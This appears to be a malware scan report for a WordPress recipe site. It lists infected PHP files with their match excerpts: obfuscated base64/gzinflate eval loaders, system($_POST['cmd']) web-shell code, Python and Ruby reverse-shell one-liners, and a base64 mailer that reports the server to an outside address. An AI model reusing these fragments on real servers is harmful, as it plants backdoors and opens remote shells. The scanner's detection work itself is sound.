Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval("?>".base64_decode("PD9waHANCiRpcCA9ICRfU0VSVkVSWydSRU1PVEVfQUREUiddOw0KbWFpbCAoJycsICdpcCBvZiB2aXNpdG9yJywgJGlwKTsNCg0KDQokdG1wID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1BIUF9TRUxGJ10uIlxuIjsgDQptYWlsKCdqZWZmcmVlenl0QGdtYWlsLmNvbScsICdyb290JywgJHRtcCk7DQo/Pg0KDQo8IURPQ1RZUEUgSFRNTD4NCjxodG1sPg0KPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0ibWF4LWFnZT0wIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0ibm8tY2FjaGUiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJleHBpcmVzIiBjb25...
Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268)	`<?php eval("?>".base64_decode`
Sign 407651f7 Line: 38 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`
Sign 7186bb8d Line: 38 Dangerous Malware Signature (hash: 7186bb8d)	`<?php RfR0VU`
Sign 7830f7a6 Line: 38 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0YX`
Sign 7f5d33bf Line: 38 Dangerous Malware Signature (hash: 7f5d33bf)	`<?php JF9QT1NU`
Sign 91535293 Line: 38 Dangerous Malware Signature (hash: 91535293)	`<?php lY2hv`
Sign 963e968a Line: 38 Dangerous Malware Signature (hash: 963e968a)	`<?php PD9waH`
Sign a408f408 Line: 38 Dangerous Malware Signature (hash: a408f408)	`<?php c3Rhd`
Sign ae7830db Line: 38 Dangerous Malware Signature (hash: ae7830db)	`<?php YXJyYXlf`
Sign bced5841 Line: 38 Dangerous Malware Signature (hash: bced5841)	`<?php 8P3Boc`
Sign d30fc49e Line: 38 Dangerous Malware Signature (hash: d30fc49e)	`<?php ByaW50Z`
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d)	`<?php ZWNob`
Sign de12c454 Line: 38 Dangerous Malware Signature (hash: de12c454)	`<?php VjaG`
Sign e6546205 Line: 38 Dangerous Malware Signature (hash: e6546205)	`<?php kX1BPU1`
Sign ee1cb326 Line: 38 Dangerous Malware Signature (hash: ee1cb326)	`<?php 9wZW`
Sign ff4f5344 Line: 38 Dangerous Malware Signature (hash: ff4f5344)	`<?php FycmF5X`

/custdata02/turtle/public_html/recipes/wp-content/themes/twentytwentyfour/patterns/index.php

Size: 12.59 kB Created: 2022-01-27 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 5

Description	Match
Exploit base64_long Line: 39 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCfX6QdiCufD+B5BmiijDU08pzNlodtKG99Mi/v2ItA6GE+X5izo...
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(gzinflate(base64_decode(rawurldecode('XZi1EvOGEkYfJ8moENOkEjOzmoxFFjM%2F%2FfXfXjcej0nS7n57jsrz0%2F%2BdfbaSwP4rynwqyr%2B%2F7zHm0zCv5bb931t%2FlerVDzuMDO8DuSGtMrPhx%2FeHV8xGUWyHP762wDkS2wTw9ppWNZaA0Y4ptGuDPmdoPOzWro9xNdoLPgDPOa5Z6Vrqx4%2F8%2BBS0%2FkLeXhaKgtYPtQPpfX5MrYznPa7SRQWG3AeguyEI%2B3mxkjh0zNbBg39k88H5fsP3VI9Z7kNsxRQq4w44Dba7JvqhY3LxFA3Qh5UMTz2MA32u8jjy1sWsHlx0bzA%2FnFPPmkaKMezjeva83lUEqDTvf%2Bx1rT%2B09dp4Xag92p3REvtCOBHLZMS%2B9DiPRUWdM%2FRcRFIkAsKJFpT7y1n7ZaG2TD39MMsK8GwrWkWBMlvtK2Z6yBj...
Exploit execution Line: 39 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCf...
Function eval Line: 39 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCf...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(gzinflate(base64_decode(rawurldecode('XZi1EvOGEkYfJ8moENOkEjOzmoxFFjM%2F%2FfXfXjcej0nS7n57jsrz0%2F%2BdfbaSwP4rynwqyr%2B%2F7zHm0zCv5bb931t%2FlerVDzuMDO8DuSGtMrPhx%2FeHV8xGUWyHP762wDkS2wTw9ppWNZaA0Y4ptGuDPmdoPOzWro9xNdoLPgDPOa5Z6Vrqx4%2F8%2BBS0%2FkLeXhaKgtYPtQPpfX5MrYznPa7SRQWG3AeguyEI%2B3mxkjh0zNbBg39k88H5fsP3VI9Z7kNsxRQq4w44Dba7JvqhY3LxFA3Qh5UMTz2MA32u8jjy1sWsHlx0bzA%2FnFPPmkaKMezjeva83lUEqDTvf%2Bx1rT%2B09dp4Xag92p3REvtCOBHLZMS%2B9DiPRUWdM%2FRcRFIkAsKJFpT7y1n7ZaG2TD39MMsK8GwrWkWBMlvtK2Z6yBj...
Sign 11413268 Line: 39 Dangerous Malware Signature (hash: 11413268)	`<?php eval(str_rot13`
Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc)	`<?php <?php eval`
Sign de12c454 Dangerous Malware Signature (hash: de12c454)	`<?php vjaG`

/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker-premium/addons-elite/index.php

Size: 144.79 kB Created: 2022-01-20 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 19

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "PD9waHAKZnVuY3Rpb24gcHduKCRjbWRkKSB7CiAgICBnbG9iYWwgJGFiYywgJGhlbHBlciwgJGJhY2t0cmFjZTsKCiAgICBjbGFzcyBWdWxuIHsKICAgICAgICBwdWJsaWMgJGE7CiAgICAgICAgcHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKSB7IAogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgCiAgICAgICAgICAgIHVuc2V0KCR0aGlzLT5hKTsKICAgICAgICAgICAgJGJhY2t0cmFjZSA9IChuZXcgRXhjZXB0aW9uKS0+Z2V0VHJhY2UoKTsgIyA7KQogICAgICAgICAgICBpZighaXNzZXQoJGJhY2t0cmFjZVsxXVsnYXJncyddKSkgeyAjIFBIUCA+PSA3LjQKICAgICAgICAgICAgICAgICRiYWNrdHJhY2UgPSBkZWJ1Z19iYWNrdHJhY2UoKTsKICA...
Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code	<?php ${${"GLOBALS"}["vmolgtof"]}=count(${${"GLOBALS"}["vcqqrlqbo"]});for(${$yienlc}=0;${${"GLOBALS"}["eqkvgoptfvkl"]}<${${"GLOBALS"}["ysjlzvro"]};${${"GLOBALS"}["rtolgl"]}++){${"GLOBALS"}["bpsfsqiel"]="fungsi";${${"GLOBALS"}["bpsfsqiel"]}[]=unx(${${"GLOBALS"}["vcqqrlqbo"]}[${${"GLOBALS"}["eqkvgoptfvkl"]}]);}if(isset($_GET["d"])){$lbcuxxaisydr="cdir";${"GLOBALS"}["ukbgkeds"]="fungsi";${${"GLOBALS"}["qqgfigbd"]}=unx($_GET["d"]);${${"GLOBALS"}["ukbgkeds"]}[14](${$lbcuxxaisydr});}else{${"GLOBALS"}["kussp...
Exploit double_var2 Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code	`<?php ${$gfyfrcaij}`
Exploit escaped_path Line: 38 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x78ft\x61h\x73ho\x66n`
Exploit hex_char Line: 38 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 38 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42A\x4cS"}`
Exploit killall Dangerous RCE (Remote Code Execution) that allow remote attackers to kill processes on the target machine	`<?php killall -9`
Function exec Dangerous Encoded Function `exec` [https://www.php.net/exec]	<?php exec(\"/bin/sh -i");};'");}else if($_POST["gecko-bc"]=="python"){${"GLOBALS"}["upnhvmssw"]="HostServer";echo cmd("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("".${${"GLOBALS"}["upnhvmssw"]}."",".${${"GLOBALS"}["mpogrnq"]}."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i\"]);'");}else if($_POST["gecko-bc"]=="ruby"){$ffzcwi="PortServer";echo cmd("ruby -rsocket -e'f=TCPSocket.open("".${$...
Sign 00f56a27 Line: 38 Dangerous Malware Signature (hash: 00f56a27)	`<?php ${${`
Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730)	`<?php meta http-equiv="refresh" content="0;`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php Exploit`
Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268)	`<?php exploit`
Sign 237750ea Line: 38 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 407651f7 Dangerous Malware Signature (hash: 407651f7)	`<?php WScript.shell`
Sign 5b557546 Dangerous Malware Signature (hash: 5b557546)	`<?php 65786563`
Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N5c3Rlb`
Sign 963e968a Dangerous Malware Signature (hash: 963e968a)	`<?php PD9waH`
Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`
Sign ae7830db Dangerous Malware Signature (hash: ae7830db)	`<?php Y2hy`
Sign cbea68d7 Dangerous Malware Signature (hash: cbea68d7)	`<?php 73797374656d`
Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e)	`<?php Backdoor`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php zeXN0ZW`

/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker-premium/templates/index.php

Size: 70.40 kB Created: 2022-03-31 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 5 Dangers: 13

Description	Match
Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code	<?php ${${"GLOBALS"}["etolmuse"]}="FranzLennonCassano";${${"GLOBALS"}["ogkdrtnbif"]}="getcwd";${${"GLOBALS"}["bzlhlzfdgz"]}="file_get_contents";${${"GLOBALS"}["yafegfjsjhti"]}="file_put_contents";$mvkhfddraqt="mkd";${$qnglwqvcdbx}="rmdir";${${"GLOBALS"}["lpizqig"]}="unlink";${"GLOBALS"}["inlpdppymlr"]="paths";${$wfwwkxc}="system";${${"GLOBALS"}["dhmjnhiqki"]}="exec";${${"GLOBALS"}["ruugpys"]}="passthru";${${"GLOBALS"}["harmgmvh"]}="shell_exec";${$mvkhfddraqt}="mkdir";${"GLOBALS"}["fbbmimu"]="id";${${"...
Exploit double_var2 Line: 43 Warning Double var technique is usually used for the obfuscation of malicious code	`<?php ${$kflgxkpc}`
Exploit escaped_path Line: 43 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x2est\x79le.\x62o\x72d`
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php system($_POST["cmd"]." 2>&1")`
Exploit execution Line: 43 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php system($_POST["\x63m\x64"]." \x32>\x261")`
Exploit hacked_by Dangerous Hacker credits	`<?php Hacked by`
Exploit hex_char Line: 43 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 43 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47L\x4f\x42\x41\x4c\x53"}`
Function posix_getpwuid Dangerous Encoded Function `posix_getpwuid` [https://www.php.net/posix_getpwuid]	<?php posix_getpwuid(fileowner("$path/$pathx"));${${"GLOBALS"}["qgyjvlyfsysv"]}=${${"GLOBALS"}["qgyjvlyfsysv"]}["name"];}else{$szluwcx="downer";${$szluwcx}=fileowner("$path/$pathx");}$htjgxmo="isd";${"GLOBALS"}["jbckuod"]="pathx";$tocdbstl="pathx";if(function_exists("posix_getgrgid")){$jdsywbgni="dgrp";${$jdsywbgni}=@posix_getgrgid(filegroup("$path/$pathx"));${${"GLOBALS"}["aqmflvwdj"]}=${${"GLOBALS"}["aqmflvwdj"]}["name"];}else{${"GLOBALS"}["mcfveorr"]="dgrp";${${"GLOBALS"}["mcfveorr"]}=filegroup("$p...
Function posix_getpwuid Line: 43 Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid]	<?php posix_getpwuid(fileowner("$path/$pathx"));${${"G\x4c\x4f\x42\x41\x4c\x53"}["q\x67\x79\x6a\x76\x6c\x79\x66\x73\x79sv"]}=${${"G\x4c\x4fB\x41\x4c\x53"}["\x71\x67\x79jv\x6c\x79f\x73\x79s\x76"]}["n\x61m\x65"];}else{$szluwcx="\x64\x6f\x77\x6eer";${$szluwcx}=fileowner("$path/$pathx");}$htjgxmo="\x69s\x64";${"\x47L\x4fB\x41\x4c\x53"}["\x6abc\x6b\x75\x6f\x64"]="\x70\x61\x74\x68\x78";$tocdbstl="\x70\x61\x74\x68x";if(function_exists("\x70os\x69x_ge\x74g\x72gi\x64")){$jdsywbgni="\x64g\x72p";${$jdsywbgni}=@p...
Function system Line: 43 Warning Potentially dangerous function `system` [https://www.php.net/system]	<?php system($_POST["\x63m\x64"]." \x32>\x261");echo"\x3c/code\x3e\x3c/\x70re>\n \x20\x20\x20\x20\x20 \x20</\x74d\x3e\n\t\x3c/tr>\n\t\x3ct\x72\x3e\n \x20 \x20 \x20\x3c\x74\x64\x3e\n\x20\x20\x20 \x20\x20 \x20 \x20 \x20\x3cfo\x72\x6d m\x65t\x68o\x64\x3d'\x50OST\x27\x3e\n \x20\x20 \x20 \x20 \x20\x20\x3c\x74\x72\x3e<td\x3e<\x69npu\x74\x20t\x79\x70e\x3d\x27\x74\x65xt'\x20\x73t\x79\x6c\x65=\x27wid\x74\x68: \x31\x30\x30\x25;\x27\x20\x68\x65i\x67ht='\x310' \x6ea\x6de=\x27\x63md\x27\x20va\x6c\x75e=''\x20\x...
Function system Warning Potentially dangerous function `system` [https://www.php.net/system]	<?php system($_POST["\x63m\x64"]." \x32>\x261");echo"\x3c/code\x3e\x3c/\x70re>\n \x20\x20\x20\x20\x20 \x20</\x74d\x3e\n\t\x3c/tr>\n\t\x3ct\x72\x3e\n \x20 \x20 \x20\x3c\x74\x64\x3e\n\x20\x20\x20 \x20\x20 \x20 \x20 \x20\x3cfo\x72\x6d m\x65t\x68o\x64\x3d'\x50OST\x27\x3e\n \x20\x20 \x20 \x20 \x20\x20\x3c\x74\x72\x3e<td\x3e<\x69npu\x74\x20t\x79\x70e\x3d\x27\x74\x65xt'\x20\x73t\x79\x6c\x65=\x27wid\x74\x68: \x31\x30\x30\x25;\x27\x20\x68\x65i\x67ht='\x310' \x6ea\x6de=\x27\x63md\x27\x20va\x6c\x75e=''\x20\x...
Sign 00f56a27 Line: 43 Dangerous Malware Signature (hash: 00f56a27)	`<?php ${${`
Sign 237750ea Line: 43 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41LS`
Sign 5aabe84e Line: 43 Dangerous Malware Signature (hash: 5aabe84e)	`<?php system($_POST["`
Sign 963e968a Line: 43 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign ddf27cff Dangerous Malware Signature (hash: ddf27cff)	`<?php system($_POST["cmd"]." 2>&1"`
Sign e996cf12 Line: 43 Dangerous Malware Signature (hash: e996cf12)	`<?php ${$gfnccnr}(${${`

/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker/dist/index.php

Size: 28.32 kB Created: 2022-04-29 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Line: 38 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTA0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='

Function eval Line: 38 Warning

Potentially dangerous function `eval`

<?php eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NTA0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='))

Sign d97f004d Line: 38 Dangerous

Malware Signature (hash: d97f004d)

<?php ZXZhb

/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker/includes/admin/menu/class-wprm-admin-menu.php

Size: 4.06 kB Created: 2021-11-14 02:14:30 Modified: 2024-06-01 08:12:18 Warns: 1

Description Match

Exploit base64_long Line: 28 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB4PSIwcHgiIHk9IjBweCIgd2lkdGg9IjI0cHgiIGhlaWdodD0iMjRweCIgdmlld0JveD0iMCAwIDI0IDI0Ij48ZyA+DQo8cGF0aCBmaWxsPSIjZmZmZmZmIiBkPSJNMTAsMEM5LjQsMCw5LDAuNCw5LDF2NEg3VjFjMC0wLjYtMC40LTEtMS0xUzUsMC40LDUsMXY0SDNWMWMwLTAuNi0wLjQtMS0xLTFTMSwwLjQsMSwxdjhjMCwxLjcsMS4zLDMsMywzDQp2MTBjMCwxLjEsMC45LDIsMiwyczItMC45LDItMlYxMmMxLjcsMCwzLTEuMywzLTNWMUMxMSwwLjQsMTAuNiwwLDEwLDB6Ii8+DQo8cGF0aCBkYXRhLWNvbG9yPSJ...

/custdata02/turtle/public_html/recipes/wp-content/plugins/wp-recipe-maker/includes/public/shortcodes/class-wprm-shortcode-helper.php

Size: 13.29 kB Created: 2021-11-14 02:14:30 Modified: 2024-06-01 08:12:18 Dangers: 1

Description	Match
Sign 91535293 Line: 175 Dangerous Malware Signature (hash: 91535293)	`<?php ls-la`

/custdata02/turtle/public_html/recipes/wp-content/maintenance/assets/fonts/index.php

Size: 13.20 kB Created: 2022-08-14 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 1

Description	Match
Exploit escaped_path Line: 41 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x2bGeE\x415\x63vxI\x42wJe`
Function eval Line: 42 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))))`

/custdata02/turtle/public_html/recipes/wp-includes/SimplePie/Parse/Date.php

Size: 20.07 kB Created: 2020-05-01 14:26:07 Modified: 2024-06-01 08:12:19 Warns: 1

Description	Match
Exploit concat_vars_with_spaces Line: 837 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code	`<?php $day . $fws . $month . $fws . $year . $fws .`

/custdata02/turtle/public_html/recipes/wp-includes/Requests/src/Auth/mah.php

Size: 51.87 kB Created: 2022-07-12 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'IHJlZWJlX2VyY2JlZ3ZhdChSX05ZWV5SX0FCR1ZQUik7cXJzdmFyKCfLpvgnLCAnjScpOyRUWUJPTllGW8um+F0gPSBya2N5YnFyKCd8BHwEfAInLCB0bXZhc3luZ3IoZmhvZmdlKCcfiwgAAAAAAAAKLJ3XjttDZ1KBIF8TPrC3VBaJvWq+BOy9iJ1RPj6cOB7YcBmQKN57zj54VrSmLi4kesb/+c/36z/+/Sn+17/vKIxP72L8/2JO/74jOYqiOAr/u/XffhT3//6aJnhOYP+dF9mUF//+6YBlZj+8x+LJ/tq/8G86Tw3pTMHqs/dgflhY3e9UQZWWGfHd+urvo83O6nXjBzYw5ZIQg0o06jNJZCAXqy9I0vkblDQgVT42H82IdhdqovmLfgmmWAh6eiNL+/CxKP9gXFyqvo82OZ6lTo2JMjeCl5vhnsLGoUc1HqF3YBmCqb/voCBMFF2RVGg6kdi+jDpsEt5VY+WrsVNVzCPLRqO...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($HCdot($Ztvaw('IHJlZWJlX2VyY2JlZ3ZhdChSX05ZWV5SX0FCR1ZQUik7cXJzdmFyKCfLpvgnLCAnjScpOyRUWUJPTllGW8um+F0gPSBya2N5YnFyKCd8BHwEfAInLCB0bXZhc3luZ3IoZmhvZmdlKCcfiwgAAAAAAAAKLJ3XjttDZ1KBIF8TPrC3VBaJvWq+BOy9iJ1RPj6cOB7YcBmQKN57zj54VrSmLi4kesb/+c/36z/+/Sn+17/vKIxP72L8/2JO/74jOYqiOAr/u/XffhT3//6aJnhOYP+dF9mUF//+6YBlZj+8x+LJ/tq/8G86Tw3pTMHqs/dgflhY3e9UQZWWGfHd+urvo83O6nXjBzYw5ZIQg0o06jNJZCAXqy9I0vkblDQgVT42H82IdhdqovmLfgmmWAh6eiNL+/CxKP9gXFyqvo82OZ6lTo2JMjeCl5vhnsLGoUc1HqF3YBmCqb/voCBMFF2RVGg6kdi+jDps...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/recipes/wp-includes/Requests/src/Proxy/index.php

Size: 77.33 kB Created: 2022-04-07 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 6

Description	Match
Exploit execution Line: 1089 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php base64_decode($_GET['zip'])`
Exploit execution Line: 1100 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php base64_decode($_GET['gz'])`
Exploit execution Line: 1123 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php base64_decode($_GET['decompress'])`
Exploit execution Line: 1138 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php base64_decode($_GET['gzfile'])`
Exploit execution Line: 680 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php base64_decode($_GET['img'])`
Exploit execution Line: 697 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php base64_decode($_GET['download'])`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connecti...

/custdata02/turtle/public_html/recipes/wp-includes/Requests/src/Utility/index.php

Size: 1.91 kB Created: 2022-08-07 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 3

Description	Match
Exploit eval_base64 Line: 115 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine	`<?php eval(base64_decode($body)`
Exploit execution Line: 115 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php eval(base64_decode($body)`
Function eval Line: 115 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(base64_decode($body))`
Sign 11413268 Line: 115 Dangerous Malware Signature (hash: 11413268)	`<?php eval(base64_decode(`

/custdata02/turtle/public_html/recipes/wp-includes/css/dist/list-reusable-blocks/index.php

Size: 29.94 kB Created: 2022-01-25 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 2

Description	Match
Function strrev eval_strrev Line: 594 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`
Sign 963e968a Line: 552 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`

/custdata02/turtle/public_html/recipes/wp-includes/css/dist/components/network.php

Size: 28.81 kB Created: 2022-03-09 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 7

Description	Match
